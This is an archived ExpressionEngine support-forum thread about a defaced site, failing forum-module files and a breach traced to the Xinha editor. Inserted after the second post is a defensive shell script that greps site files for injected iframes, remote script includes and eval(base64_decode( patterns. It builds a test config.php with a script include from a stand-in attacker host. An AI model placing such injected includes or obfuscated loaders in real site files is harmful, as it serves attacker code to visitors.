ExpressionEngine CMS


This is an archived forum and the content is probably no longer relevant, but is provided here for posterity.


Site hacked, error messages

April 15, 2010 1:43pm

  • #1 / Apr 15, 2010 1:43pm

    Gary Chapman

    107 posts

    I’ve been getting lots and lots of spammer/hacker registrations, which have been going into the “pending” member group that has no site privileges. Presumably these are automated registrations.

    Trying to delete these, I get the following error page:

    Warning: require(/home/gary21cp/public_html/admin/modules/forum/mod.forum.php) [function.require]: failed to open stream: Permission denied in /home/gary21cp/public_html/admin/cp/cp.members.php on line 1127

    Fatal error: require() [function.require]: Failed opening required ‘/home/gary21cp/public_html/admin/modules/forum/mod.forum.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/gary21cp/public_html/admin/cp/cp.members.php on line 1127

    I went to the Discussion Forum module. Clicking on “Discussion Forum” in the module control panel, I get this error page:

    Warning: require(/home/gary21cp/public_html/admin/modules/forum/mcp.forum.php) [function.require]: failed to open stream: Permission denied in /home/gary21cp/public_html/admin/cp/cp.modules.php on line 300

    Fatal error: require() [function.require]: Failed opening required ‘/home/gary21cp/public_html/admin/modules/forum/mcp.forum.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in /home/gary21cp/public_html/admin/cp/cp.modules.php on line 300

    The site at http://21stcenturyproject.org has been totally defaced by hackers, but I can get access to the CP, and I’ve backed everything up. The hosting service is looking into the security breach that led to the pages’ defacement.

    But I need to figure out what’s going on in the error messages above so I can delete all these spammer registrations.

    I have reinstalled the Discussion Forum from the original files (2.1.2), and I replaced cp.modules.php and cp.members.php from the original EE files.

    I’m using 1.6.8, Build 20100121.

    BTW, the hackers who trashed the site are from the “Kosovo Hacking School,” reportedly.

    Thanks.

  • #2 / Apr 15, 2010 3:17pm

    Sue Crocker

    26054 posts

    Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that end, we need some additional information from you…

      1. EE version and build (found at the bottom of your control panel)
      2. Other scripts on your account, whether in use or not (phpBB, etc…)*

      * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

      While we work through this, please check through these files:

      * path.php
      * config.php
      * index.php

      to ensure that there is no unusual code such as iFrames or Javascript includes; if you do find that code, then please back up the file and remove said code. If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

      You may also wish to refresh your files by following the build update instructions.

      Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.
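The file check Sue describes above, as an added example (not code from this thread, from ExpressionEngine, or from the poster). It greps path.php, config.php and index.php for the injected iframes and remote script includes she mentions, and it also reports files that are not readable, since the "failed to open stream: Permission denied" require() errors in the first post are what a permission problem looks like from PHP's side. The signature patterns and the sample install it creates are constructed for the demonstration; the `scan_file`, `scan_ee_root` and `make_sample` names are this example's own.

```shell
#!/bin/sh
# Added example: scan an ExpressionEngine root for injected code in the
# three files from the checklist, and flag files the web user cannot read.

# scan_file FILE
#   prints one line per finding
#   returns 0 = clean, 1 = suspicious content found, 2 = missing or unreadable
scan_file() {
    f="$1"
    if [ ! -r "$f" ]; then
        printf 'UNREADABLE: %s (missing, or ownership/permissions need fixing)\n' "$f"
        return 2
    fi
    found=0
    # Extended regexes, one per line, matched case-insensitively.
    # Constructed signatures of injected defacement/redirect code.
    while IFS= read -r pat; do
        [ -n "$pat" ] || continue
        if grep -Eiq -- "$pat" "$f"; then
            printf 'SUSPICIOUS: %s matches %s\n' "$f" "$pat"
            found=1
        fi
    done <<'EOF'
<iframe
<script[^>]*src=["']?https?://
eval\(base64_decode\(
document\.write\(unescape\(
EOF
    return $found
}

# scan_ee_root DIR
#   scans the three files from the checklist under DIR
#   returns the number of files that were unreadable or suspicious
scan_ee_root() {
    dir="$1"
    bad=0
    for name in path.php config.php index.php; do
        rc=0
        scan_file "$dir/$name" || rc=$?
        if [ "$rc" -eq 0 ]; then
            printf 'OK: %s\n' "$dir/$name"
        else
            bad=$((bad + 1))
        fi
    done
    printf '%s file(s) need attention under %s\n' "$bad" "$dir"
    return "$bad"
}

# make_sample DIR
#   constructed sample install: clean index.php and path.php, and a
#   config.php with a remote script include appended after the PHP block
make_sample() {
    dir="$1"
    mkdir -p "$dir"
    printf '<?php\n// constructed placeholder, nothing unusual here\n' > "$dir/index.php"
    printf '<?php\n// constructed placeholder, nothing unusual here\n' > "$dir/path.php"
    printf '<?php\n// constructed placeholder\n?>\n<script src="http://attacker.invalid/x.js"></script>\n' > "$dir/config.php"
}

# Demo run against the constructed sample; point scan_ee_root at a real
# site root instead when using this for an actual check.
tmp=$(mktemp -d)
make_sample "$tmp"
scan_ee_root "$tmp" || true
rm -rf "$tmp"
```

Run it from a shell with read access to the site files; anything reported as UNREADABLE needs its ownership or mode corrected before the PHP errors above will go away, and anything reported as SUSPICIOUS should be backed up and inspected by hand, as Sue says, rather than trusted to a pattern match.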

  • #3 / Apr 15, 2010 3:51pm

    Gary Chapman

    107 posts

    Hi Sue, thanks for the reply.

    EE version and build number are in the original post.

    No other scripts running on this account. This is a virtual private server.

    The hosting company has been notified and they have a security team looking into it.

    —Gary

  • #4 / Apr 15, 2010 4:59pm

    Ingmar

    29245 posts

    Please let us know when you hear back from the host. They should be able to tell us a little more about the incident.

  • #5 / Apr 15, 2010 5:13pm

    Gary Chapman

    107 posts

    I forgot about Xinha, which appears to have been the vulnerability. I put the Xinha WYSIWYG editor in my wiki, as a Javascript call. The hosting company says that a remote file inclusion attack was successful through the Xinha directory.

    I’ll have to reinstall EE, it appears, but I may move to a different host anyway.

    I guess I won’t use Xinha…

    —Gary

  • #6 / Apr 15, 2010 5:15pm

    Ingmar

    29245 posts

    Thanks for the info. Depending on the state of your database (or in case you have a recent backup) all you might have to do is replace your EE files, to be on the safe side. No need to actually re-install EE as such.

  • #7 / Apr 15, 2010 6:58pm

    Gary Chapman

    107 posts

    The site is back up, fixed.

    People should not use Xinha.

    —Gary

  • #8 / Apr 15, 2010 10:20pm

    Brandon Jones

    5500 posts

    Thank you for the information, Gary. Glad you found the cause and were able to get back up and running.

